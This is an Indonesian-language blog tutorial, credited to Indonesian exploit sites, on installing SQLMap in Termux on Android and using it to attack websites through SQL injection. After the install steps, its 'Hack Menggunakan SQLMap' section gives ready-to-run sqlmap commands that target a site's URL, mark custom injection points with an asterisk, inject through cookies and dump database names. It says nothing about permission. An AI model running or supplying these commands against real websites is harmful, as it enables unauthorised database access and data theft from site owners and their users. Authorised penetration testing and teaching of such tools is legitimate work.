SQL Injection

SQL Injection Menggunakan SQLMap di Termux Terbaru 2022

Halo Team, kali ini saya akan membahas tentang cara menginstal SQLMap di termux dan beberapa hal mengenai SQLMap, dan cara untuk menggunakan SQLMap untuk melakukan serangan SQL Injection di Termux.

Oke sebelum kalian mengetahui bagaimana cara instal SQLMap di termux ada baiknya kita kenal lebih dekat apa itu SQLMap, dan beberapa istilah yang masih sangat erat dengan SQLMap ini.

SQLMap

SQLMap adalah tool uji penetrasi open source yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan injeksi SQL dan mengambil alih basis data server.

Jadi sqlmap ini adalah tools yang dapat mendeteksi dan melakukan exploit pada bug SQL injection secara otomatis. Dengan melakukan serangan SQL injection seorang attacker dapat mengambil alih serta memanipulasi sebuah database di dalam sebuah server.

SQL Injection

SQL injection adalah teknik hacking di mana attacker dapat menyisipkan perintah-perintah SQL melalu URL untuk di eksekusi oleh database. Bug atau vulnerability ini terjadi karena kelalian seorang programer atau webmaster dalam melakukan pemograman web seperti tidak difilternya variabel dalam web tersebut.

Database

Database adalah kumpulan informasi yang disimpan di dalam komputer atau webserver secara sistematik yang berguna untuk memperoleh informasi dari basis data tersebut.

Instal SQLMap

Oke, kita masuk ke inti pembahasan, yaitu mengintal SQLMap di hp Android kita. Untuk menginstal tool SQLMap di Android kita tidak perlu rooting hp Android. cukup Gunakan aplikasi emulator linuk yaitu Termux.

Instalasi SQLMap

• Download Termuk
• Git Hub SQLMap https://github.com/sqlmapproject/sqlmap

Comand Instal SQLMap di Termuk

• $ pkg update
• $ pkg upgrade
• $ pkg install python2
• $ pkg install git
• $ git clone https://github.com/sqlmapproject/sqlmap

Instalasi SQLMap di Termux

Untuk meng-instal SQLMap di termux, cukup memasukan perintah-perintah di atas. untuk penjelasannya langsung, silahkan simak tutorial SQLMap Termux:

Langkah 1: Download dan buka aplikasi termux kalian, jika sudah kebuka, masukan comad berikut: $ pkg update dan $ pkg upgrade 

Langkah 2: Selanjutnya yaitu menginstal bahasa progam python di termux agar SQLMap bisa berjalan di termux, masukan perintah: $ pkg install python2 

Langkah 3: Instal Git untuk mengkloning SQLMap dari git hub, masukan perintah: $ pkg install git

Langkah 4: Cloning SQLMap dari git hubnya, masukan perintah: $ git clone https://github.com/sqlmapproject/sqlmap

Tunggu hingga proses download SQLMap dari git hub selesai, munkin agak lama, tergantung kecepatan koneksi internet kalian.

Oke, Sekarang kita sudah berhasil menginstal SQLMap di Termux.

Cara Menggunakan SQLMap

Untuk menggunakan SQLMap di hp Android menggunakan termuk cukuplah mudah, kita cukup memasukan perintah untuk menjalankan SQLMap di termux:

Comand SQLMap

• $ ls
• $ cd sqlmap
• $ python2 sqlmap.py

Menjalankan SQLMap di Termux

Langkah 1: Untuk membuka paket yang terinstal di aplikasi termuk, masulan perintah: $ ls

Langkah 2: Selanjutnya, menjalankan atau membuka paket yang terinstal di termux, disini kita akan membuka paket SQLMap. Jadi masukan perintah: $ cd sqlmap lalu klik enter.

Langkah 3: Masukan perintah berikutnya: $ python2 sqlmap.py

Tunggu hinga selesai, jika SQLMap sudah berhasil kalian instal.

Oke Sekarang SQLMap sudah derhasil kita pasang di termux. Sesuai yang kita jelaskan di atas, SQLMap adalah tool uji penetrasi website. untuk melakukan injec menggunakan SQLMap simak panduan berikut:

Hack Menggunakan QSLMap

Untuk melakukan SQL Ijection menggunakan SQLMap di termux, kita cukup memasukan perintah berikut:

$ python2 sqlmap.py -u (url)

Penjelasan: Url adalah target url website yang akan kita serang menggunakan teknik SQL Injection.

Contoh: $ python2 sqlmap.py -u target.com/a.php?b=1

Menentukan Inject Point pada SQLmap

Menentukan Inject Point pada SQLmap. Kita sering melihat tutorial bagaimana menginjeksi url yang vuln. Namun rata-rata tutorial yang diberikan adalah basic sqlmap dimana inject pointnya selalu sama yakni target.com/a.php?b=1. Nah, bagaimana jika inject pointnya berbeda? Di Sqlmap kita bisa menentukan inject pointnya.

Misalnya begini:

https://target.com/article.php?page=2&id=5

Dan inject pointnya ada di parameter id. Maka perintahnya

python2 sqlmap -u "https://target.com/article.php?page=2&id=5*" --dbs

Ya, hanya dengan menambahkan karakter * di inject point. Hal ini juga berlaku jika yang diinject adalah halaman statis html. Misalnya vuln di

https://target.com/article-315'-abcde.html

Maka di sqlmap perintahnya

python2 sqlmap -u "https://target.com/article-315*-abcde.html" --dbs

Begitu juga dengan sqlmap post data, inject pointnya bisa ditentukan, misalnya

python2 sqlmap -u "http://targeturl" --cookie="param1=value1*;param2=value2"

Itulah beberapa hal yang harus kalian pelajari jika ingin menginstal SQLMap di termux dan menggunakan SQLMap untuk uji penetrasi.

Tinggalkan komentar di bawah ini jika kalian kurang memahami Artikel ini, bisa bertanya tanya, semoga artikel ini bermanfaat... selamat mencoba, Anda Sopan Kami Segan 

Credits : xploit.linuxsec.org - indoxploit.id